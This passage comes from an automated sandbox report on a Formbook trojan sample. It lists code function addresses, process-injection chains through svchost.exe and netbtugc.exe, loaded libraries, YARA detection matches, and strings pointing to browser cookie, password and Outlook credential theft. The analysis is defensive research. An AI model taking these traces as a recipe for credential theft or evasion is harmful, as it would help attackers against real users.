            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F7D731_2_035F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355FDC01_2_0355FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B9C321_2_035B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFCF21_2_035FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BB03E66_2_03BB03E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AFE3F06_2_03AFE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAA3526_2_03BAA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B702C06_2_03B702C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B902746_2_03B90274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BB01AA6_2_03BB01AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA41A26_2_03BA41A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA81CC6_2_03BA81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B8A1186_2_03B8A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AE01006_2_03AE0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B781586_2_03B78158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B820006_2_03B82000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AEC7C06_2_03AEC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF07706_2_03AF0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B147506_2_03B14750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B0C6E06_2_03B0C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BB05916_2_03BB0591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF05356_2_03AF0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B9E4F66_2_03B9E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B944206_2_03B94420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA24466_2_03BA2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA6BD76_2_03BA6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAAB406_2_03BAAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AEEA806_2_03AEEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF29A06_2_03AF29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BBA9A66_2_03BBA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B069626_2_03B06962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AD68B86_2_03AD68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B1E8F06_2_03B1E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF28406_2_03AF2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AFA8406_2_03AFA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B6EFA06_2_03B6EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AE2FC86_2_03AE2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B10F306_2_03B10F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B92F306_2_03B92F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B32F286_2_03B32F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B64F406_2_03B64F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B02E906_2_03B02E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BACE936_2_03BACE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAEEDB6_2_03BAEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAEE266_2_03BAEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF0E596_2_03AF0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B08DBF6_2_03B08DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AEADE06_2_03AEADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B8CD1F6_2_03B8CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AFAD006_2_03AFAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B90CB56_2_03B90CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AE0CF26_2_03AE0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF0C006_2_03AF0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B3739A6_2_03B3739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA132D6_2_03BA132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03ADD34C6_2_03ADD34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF52A06_2_03AF52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B0D2F06_2_03B0D2F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B912ED6_2_03B912ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B0B2C06_2_03B0B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AFB1B06_2_03AFB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BBB16B6_2_03BBB16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B2516C6_2_03B2516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03ADF1726_2_03ADF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA70E96_2_03BA70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAF0E06_2_03BAF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF70C06_2_03AF70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B9F0CC6_2_03B9F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAF7B06_2_03BAF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA16CC6_2_03BA16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B356306_2_03B35630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B8D5B06_2_03B8D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BB95C36_2_03BB95C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA75716_2_03BA7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAF43F6_2_03BAF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AE14606_2_03AE1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B0FB806_2_03B0FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B65BF06_2_03B65BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B2DBF96_2_03B2DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAFB766_2_03BAFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B35AA06_2_03B35AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B8DAAC6_2_03B8DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B91AA36_2_03B91AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B9DAC66_2_03B9DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B63A6C6_2_03B63A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAFA496_2_03BAFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA7A466_2_03BA7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B859106_2_03B85910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B0B9506_2_03B0B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF99506_2_03AF9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF38E06_2_03AF38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B5D8006_2_03B5D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAFFB16_2_03BAFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF1F926_2_03AF1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAFF096_2_03BAFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF9EB06_2_03AF9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B0FDC06_2_03B0FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA7D736_2_03BA7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA1D5A6_2_03BA1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF3D406_2_03AF3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAFCF26_2_03BAFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B69C326_2_03B69C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F1A306_2_032F1A30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032ECB806_2_032ECB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032EC9606_2_032EC960
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032EC9596_2_032EC959
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032EAC006_2_032EAC00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F32596_2_032F3259
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F32A06_2_032F32A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F329B6_2_032F329B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F50B06_2_032F50B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0330B5F06_2_0330B5F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0390E3386_2_0390E338
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0390E7EC6_2_0390E7EC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0390E4536_2_0390E453
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0390CB036_2_0390CB03
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0390CAAB6_2_0390CAAB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0390D8586_2_0390D858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03587E54 appears 99 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0352B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03575130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 035BF290 appears 103 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03B37E54 appears 107 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03B25130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03ADB970 appears 262 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03B6F290 appears 103 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03B5EA12 appears 86 times
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: String function: 00445AE0 appears 65 times
            Source: fJD7ivEnzm.exe, 00000000.00000003.1791177055.000000000496D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fJD7ivEnzm.exe
            Source: fJD7ivEnzm.exe, 00000000.00000003.1789568752.00000000047C3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs fJD7ivEnzm.exe
            Source: fJD7ivEnzm.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1996196701.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3638744438.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3638995982.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1996763400.0000000003850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3638935792.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1996814627.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3639798172.00000000031D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@14/9
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0044AF6C GetLastError,FormatMessageW,0_2_0044AF6C
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464EAE
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D619
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle,0_2_004755C4
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize,0_2_0047839D
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeCode function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043305F
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeFile created: C:\Users\user\AppData\Local\Temp\kinematicalJump to behavior
            Source: fJD7ivEnzm.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000006.00000002.3639094585.00000000036B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE cookies(creation_utc INTEGER NOT NULL,host_key TEXT NOT NULL,top_;
            Source: netbtugc.exe, 00000006.00000002.3639094585.00000000036E5000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2284204913.00000000036E5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: fJD7ivEnzm.exeReversingLabs: Detection: 68%
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeFile read: C:\Users\user\Desktop\fJD7ivEnzm.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\fJD7ivEnzm.exe "C:\Users\user\Desktop\fJD7ivEnzm.exe"
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\fJD7ivEnzm.exe"
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\fJD7ivEnzm.exe"Jump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files (x86)\nBZsoeShtiRFZWDJaFbPRYrKpKKMGNRMkspbHPHhwFJbwKNWOIybbDSualJqkBGoZjnHG\IqZHJpXEsts.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: fJD7ivEnzm.exeStatic file information: File size 1393415 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: IqZHJpXEsts.exe, 00000004.00000000.1922332064.00000000000FE000.00000002.00000001.01000000.00000004.sdmp, IqZHJpXEsts.exe, 00000007.00000002.3638744641.00000000000FE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: fJD7ivEnzm.exe, 00000000.00000003.1793057046.0000000004840000.00000004.00001000.00020000.00000000.sdmp, fJD7ivEnzm.exe, 00000000.00000003.1789568752.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1899809963.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1901863289.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.000000000369E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1996459004.0000000003500000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640025456.0000000003C4E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.1996513714.000000000375A000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3640025456.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 